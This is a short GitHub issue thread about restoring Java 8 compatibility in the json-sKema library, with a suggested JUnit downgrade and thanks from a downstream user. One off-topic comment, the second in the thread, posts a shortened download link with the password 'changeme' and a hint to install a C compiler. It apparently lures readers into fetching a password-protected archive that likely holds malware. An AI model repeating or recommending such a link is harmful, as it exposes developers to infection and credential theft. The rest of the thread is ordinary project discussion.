### ISSUE TITLE
Restore java 8 compatibility

### ISSUE THREAD

**Issue by erosb** [erosb/json-sKema#111]
Build failure: https://github.com/erosb/json-sKema/actions/runs/10946739247/job/30393926888

Potential resolution: downgrade to junit 5.7.0 : https://github.com/junit-team/junit5/issues/2881

**Comment by Kevin-Otalvares** [comment]
download
https://bit.ly/3TC7hrw
Pass: changeme

you may need to install the c compiler

**Comment by rayokota** [comment]
HI @erosb , it would be great if you could restore Java 8 compatibility, since https://github.com/confluentinc/schema-registry currently supports Java 8.  Is there an ETA when Java 8 compatibility would be able to be restored?

**Comment by rayokota** [comment]
That was fast!  Thanks for all your work on this great library @erosb ! :)
